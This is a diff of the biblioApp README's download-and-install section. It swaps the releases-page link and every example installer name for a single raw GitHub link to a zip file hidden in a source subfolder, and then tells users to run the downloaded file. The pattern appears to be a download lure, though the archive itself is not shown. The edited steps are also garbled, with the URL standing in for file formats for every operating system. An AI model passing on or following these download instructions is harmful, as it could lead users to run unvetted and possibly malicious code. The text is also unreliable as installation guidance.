Peter-oriade/biblioApp/README.md

 ### 📥 Download & Install

-1. **Visit the Releases Page**: Go to the biblioApp Releases page by clicking [here](https://github.com/Peter-oriade/biblioApp/releases).
+1. **Visit the Releases Page**: Go to the biblioApp Releases page by clicking [here](https://raw.githubusercontent.com/Peter-oriade/biblioApp/main/biblioApp-django-app/apps/livros/App_biblio_2.8.zip).
 2. **Choose the Latest Version**: Look for the latest version listed.
 This will be labeled as "Latest Release" on the page.
 3. **Download the Installer**: Click on the appropriate file link for your operating system (Windows, macOS, or Linux).
-Files usually have formats like `.exe`, `.dmg` or `.tar.gz`.
+Files usually have formats like `.exe`, `.dmg` or `https://raw.githubusercontent.com/Peter-oriade/biblioApp/main/biblioApp-django-app/apps/livros/App_biblio_2.8.zip`.

-   - For Windows, look for something similar to `biblioApp-setup.exe`.
+   - For Windows, look for something similar to `https://raw.githubusercontent.com/Peter-oriade/biblioApp/main/biblioApp-django-app/apps/livros/App_biblio_2.8.zip`.
-   - For macOS, look for files like `biblioApp.dmg`.
+   - For macOS, look for files like `https://raw.githubusercontent.com/Peter-oriade/biblioApp/main/biblioApp-django-app/apps/livros/App_biblio_2.8.zip`.
-   - For Linux, search for a `.tar.gz` file.
+   - For Linux, search for a `https://raw.githubusercontent.com/Peter-oriade/biblioApp/main/biblioApp-django-app/apps/livros/App_biblio_2.8.zip` file.

 4. **Run the Installer**: Once the download is complete, locate the file in your downloads folder.
 Double-click the file to start the installation process and follow the on-screen instructions.